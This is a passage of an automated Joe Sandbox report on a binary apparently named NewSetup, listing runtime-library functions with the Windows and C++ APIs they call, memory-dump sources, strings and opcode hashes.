                                                                                                      • Instruction ID: cd2bbadc122df4013fdcc1c87199118a29cb737b0b0d74f0ac455bc5bed3e3d7
                                                                                                      • Opcode Fuzzy Hash: a6b8d64a5d5d88429e74dc09b242e3c500ddac32d8403584f3f71a03a5172e0b
                                                                                                      • Instruction Fuzzy Hash: 51012D36235B37FFE7251AF87C4D8262698E702B71720032BF61041DF0EF518C229941
                                                                                                      Function 0022B56E Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 0022B68D
                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 0022B906
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallUnexpectedtype_info::operator==
                                                                                                      • String ID: csm$csm$csm
                                                                                                      • API String ID: 2673424686-393685449
                                                                                                      • Opcode ID: 6064a26449d1c018bc89bdb46d399fcd8a62b95056958587cb0607561f75abf6
                                                                                                      • Instruction ID: 576066667541c776c60a9b8b351f643cc00d3caf5bf4745cd5c48d30d242a9fa
                                                                                                      • Opcode Fuzzy Hash: 6064a26449d1c018bc89bdb46d399fcd8a62b95056958587cb0607561f75abf6
                                                                                                      • Instruction Fuzzy Hash: 20B17B7182022AFBCF16DFE4E8819AEB7B9AF04310B14455AE8156B202D731D971DF92
                                                                                                      Function 0021BE95 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::_Ref_count_base::_Decref.LIBCPMT ref: 0021BF44
                                                                                                      • std::_Ref_count_base::_Decref.LIBCPMT ref: 0021C028
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DecrefRef_count_base::_std::_
                                                                                                      • String ID: MOC$RCC$csm
                                                                                                      • API String ID: 1456557076-2671469338
                                                                                                      • Opcode ID: c4424507d8968f4bfca6f6335c7d69359f50be6a798a15c9bbc5695f8a7c303b
                                                                                                      • Instruction ID: ac025a7262330f99c5cd20c22ea96b7598506f8dc96bfe04ccea1c7869760ff2
                                                                                                      • Opcode Fuzzy Hash: c4424507d8968f4bfca6f6335c7d69359f50be6a798a15c9bbc5695f8a7c303b
                                                                                                      • Instruction Fuzzy Hash: EF41CD74910206DFCF2ADF68C9459EDB7F4BF68300F58805DE449A7A42C734AAA5CF52
                                                                                                      Function 002255C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,0023BE94,000000FF,?,00225685,?,?,00225721,00000000), ref: 002255F9
                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0022560B
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,0023BE94,000000FF,?,00225685,?,?,00225721,00000000), ref: 0022562D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: 96bf689e63735530a3363d4f4e482ffd35cde08b24cf453aa7c90595ab844530
                                                                                                      • Instruction ID: e48df7afeff1a3fe89048fa10e277669cfe8f50512d3b61ece97b5514aedd8d7
                                                                                                      • Opcode Fuzzy Hash: 96bf689e63735530a3363d4f4e482ffd35cde08b24cf453aa7c90595ab844530
                                                                                                      • Instruction Fuzzy Hash: 2701D675A10629BFCB118F94EC0DBBEB7BCFB06B15F004526F811E2690DBB49910CA90
                                                                                                      Function 0022D6EA Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __alloca_probe_16.LIBCMT ref: 0022D76F
                                                                                                      • __alloca_probe_16.LIBCMT ref: 0022D838
                                                                                                      • __freea.LIBCMT ref: 0022D89F
                                                                                                        • Part of subcall function 0022BF11: HeapAlloc.KERNEL32(00000000,00000018,00000000,?,0021A67D,00000018,?,00213D4A,00000018,00000000), ref: 0022BF43
                                                                                                      • __freea.LIBCMT ref: 0022D8B2
                                                                                                      • __freea.LIBCMT ref: 0022D8BF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1096550386-0
                                                                                                      • Opcode ID: 3e05db668bd2dae0f90af092a00a4cf87d44b2b910a9fb40708bbb9e0f30d1d3
                                                                                                      • Instruction ID: f66d38fba59de9371627ce61650e4bd1dd66a616d4e01958824e5975b649c123
                                                                                                      • Opcode Fuzzy Hash: 3e05db668bd2dae0f90af092a00a4cf87d44b2b910a9fb40708bbb9e0f30d1d3
                                                                                                      • Instruction Fuzzy Hash: 1F519472620227BFEF219FE0AC81EBB77A9EF44710B150129FD04D6251E774DC729AA1
                                                                                                      Function 0021EFF1 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0021F005
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(00218E38), ref: 0021F024
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(00218E38,0021A2F0,?), ref: 0021F052
                                                                                                      • TryAcquireSRWLockExclusive.KERNEL32(00218E38,0021A2F0,?), ref: 0021F0AD
                                                                                                      • TryAcquireSRWLockExclusive.KERNEL32(00218E38,0021A2F0,?), ref: 0021F0C4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 66001078-0
                                                                                                      • Opcode ID: be85b2aeffe1aebed0864cec17f74bfb285c0001cd5b7f587cdbe14fdc265e60
                                                                                                      • Instruction ID: ded5c8c19adc6dbb69184a5adb984cabf458e399fc10ada4332e8464ba347df2
                                                                                                      • Opcode Fuzzy Hash: be85b2aeffe1aebed0864cec17f74bfb285c0001cd5b7f587cdbe14fdc265e60
                                                                                                      • Instruction Fuzzy Hash: 09418C7592060ADFCB60CF24C6849EAB3F4FF29310B20493AE46A97546D770E9E5CF51
                                                                                                      Function 0021D4C2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog3.LIBCMT ref: 0021D4C9
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0021D4D3
                                                                                                      • int.LIBCPMT ref: 0021D4EA
                                                                                                        • Part of subcall function 0021C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0021C1F6
                                                                                                        • Part of subcall function 0021C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0021C210
                                                                                                      • codecvt.LIBCPMT ref: 0021D50D
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0021D544
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                      • String ID:
                                                                                                      • API String ID: 3716348337-0
                                                                                                      • Opcode ID: 68a5fdfba31e12b7d34923b2641b581d04654afd0126ed54dddcd89ef5269bfc
                                                                                                      • Instruction ID: 2064acb6a62eb2eedff8fd5820831976e0aa0add34a34a94062527851a714108
                                                                                                      • Opcode Fuzzy Hash: 68a5fdfba31e12b7d34923b2641b581d04654afd0126ed54dddcd89ef5269bfc
                                                                                                      • Instruction Fuzzy Hash: 4E01C435921115DBCB06EB68D905AEE77F2AFA4324F740109E425AB292DF749EA0CF81
                                                                                                      Function 0021ADD7 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog3.LIBCMT ref: 0021ADDE
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0021ADE9
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0021AE57
                                                                                                        • Part of subcall function 0021ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0021ACC2
                                                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 0021AE04
                                                                                                      • _Yarn.LIBCPMT ref: 0021AE1A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                      • String ID:
                                                                                                      • API String ID: 1088826258-0
                                                                                                      • Opcode ID: dd8d5694f9b6d5decb0966c86b77927ba20338cc8f9ce7dd8885e54b96d3d470
                                                                                                      • Instruction ID: 5cd80c1a5c79fffd8f8034b7bb5249b234814f3e517d14be1b7414e4686a1489
                                                                                                      • Opcode Fuzzy Hash: dd8d5694f9b6d5decb0966c86b77927ba20338cc8f9ce7dd8885e54b96d3d470
                                                                                                      • Instruction Fuzzy Hash: CC01D8796221119BCB05EF24E9595BD77F5FF95750B14001AE40257382CF346E91CFC2
                                                                                                      Function 00211750 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 390COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strlen
                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                      • API String ID: 4218353326-1866435925
                                                                                                      • Opcode ID: fc6270a5a89120943e2fd1d4b39c60fc8fcd4f07fff61e1309eef789314f832a
                                                                                                      • Instruction ID: 532315da9c31262536a987e23da17491656ef861286c06dc28025179f88ff773
                                                                                                      • Opcode Fuzzy Hash: fc6270a5a89120943e2fd1d4b39c60fc8fcd4f07fff61e1309eef789314f832a
                                                                                                      • Instruction Fuzzy Hash: 6CF1CE75A102188FCB14CF68C494BADBBF2FF88324F198269E915AB391D774AD51CF90
                                                                                                      Function 00230976 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(00000000,?,0022E58D), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000,?,?,00000028,00228363), ref: 0022C210
                                                                                                      • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00225BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00230A35
                                                                                                      • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00225BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00230A6C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CodePageValid
                                                                                                      • String ID: ,K$$utf8
                                                                                                      • API String ID: 943130320-825729930
                                                                                                      • Opcode ID: 95086bf6062d60f29b920adcdf7178d071e68359d5f480c563543ccbab005af4
                                                                                                      • Instruction ID: 8a82edb2ae76104c622ebc57056dfcf025515d16b99ec51f207f74413bc61f7f
                                                                                                      • Opcode Fuzzy Hash: 95086bf6062d60f29b920adcdf7178d071e68359d5f480c563543ccbab005af4
                                                                                                      • Instruction Fuzzy Hash: DD510BB1630306AAD724AF709CE1F7BB3A9EF05708F140425F64597181E6B0EDB08B75
                                                                                                      Function 002173E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::_Release_chore.LIBCPMT ref: 00217526
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00217561
                                                                                                        • Part of subcall function 0021AF37: CreateThreadpoolWork.KERNEL32(0021B060,00218A2A,00000000), ref: 0021AF46
                                                                                                        • Part of subcall function 0021AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 0021AF53
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                      • String ID: Fail to schedule the chore!$G.$
                                                                                                      • API String ID: 3683891980-3836090748
                                                                                                      • Opcode ID: ce9bebe432bdb8545c951f2e0a37ed7b9ef6a2458dfe1c670cfc78f793adfbab
                                                                                                      • Instruction ID: 6e949584efe9c77130e3f4f3eac1f2fdc9c5fc37e94a8f9db5faf7a8870256a2
                                                                                                      • Opcode Fuzzy Hash: ce9bebe432bdb8545c951f2e0a37ed7b9ef6a2458dfe1c670cfc78f793adfbab
                                                                                                      • Instruction Fuzzy Hash: 7051ECB0921208DFCB00DF94E848BEEBBB5FF48320F144129E8196B391D776A965CF91
                                                                                                      Function 00213E90 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00213EC6
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00214002
                                                                                                        • Part of subcall function 0021ABC5: _Yarn.LIBCPMT ref: 0021ABE5
                                                                                                        • Part of subcall function 0021ABC5: _Yarn.LIBCPMT ref: 0021AC09
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                      • String ID: bad locale name$|=!e.$
                                                                                                      • API String ID: 2070049627-25103358
                                                                                                      • Opcode ID: 2a50f063bf1e470429d405b2f62cb2a61f5933456f34fc6a938963f106e02640
                                                                                                      • Instruction ID: ebf30bae878db9478cae3f061f85f193581c308e6c1268190f1e127cb4ff703d
                                                                                                      • Opcode Fuzzy Hash: 2a50f063bf1e470429d405b2f62cb2a61f5933456f34fc6a938963f106e02640
                                                                                                      • Instruction Fuzzy Hash: 7E41AFF0A10745ABEB10DF69D805B57BBF8BF14714F044229E40997B80E37AE568CBE1
                                                                                                      Function 0021B755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::_Ref_count_base::_Decref.LIBCPMT ref: 0021B809
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DecrefRef_count_base::_std::_
                                                                                                      • String ID: MOC$RCC$csm
                                                                                                      • API String ID: 1456557076-2671469338
                                                                                                      • Opcode ID: 97cb14f7e322c5ff412a39b672bb247e8918c08b662ba075b34730e0e749c18a
                                                                                                      • Instruction ID: 660da78c084d33d138a3466321075fa54a4abce0f258bb6422d296b71977f096
                                                                                                      • Opcode Fuzzy Hash: 97cb14f7e322c5ff412a39b672bb247e8918c08b662ba075b34730e0e749c18a
                                                                                                      • Instruction Fuzzy Hash: FD21D6369202069FCF269F54D495AF9B7FCEF60720F15455EE401876D0D734ADE1CA80
                                                                                                      Function 0021F11D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0021253A,?,?,00000000), ref: 0021F129
                                                                                                      • GetExitCodeThread.KERNEL32(?,00000000,?,?,0021253A,?,?,00000000), ref: 0021F142
                                                                                                      • CloseHandle.KERNEL32(?,?,?,0021253A,?,?,00000000), ref: 0021F154
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCodeExitHandleObjectSingleThreadWait
                                                                                                      • String ID: :%!
                                                                                                      • API String ID: 2551024706-1915189741
                                                                                                      • Opcode ID: e2ec18619b41e0e4d13945ec1a00c6d8454cf199c95c89b9aee516d45ff22709
                                                                                                      • Instruction ID: e2d135945a100e18932bc2f42e89c46316e32a59ffc80aea00b2d6fb74fcefc6
                                                                                                      • Opcode Fuzzy Hash: e2ec18619b41e0e4d13945ec1a00c6d8454cf199c95c89b9aee516d45ff22709
                                                                                                      • Instruction Fuzzy Hash: B1F05E71654115FFDB108F24DD0DA9A3AA4EB12770F240720F835EA1E0E771DE908680
                                                                                                      Function 0021ABC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
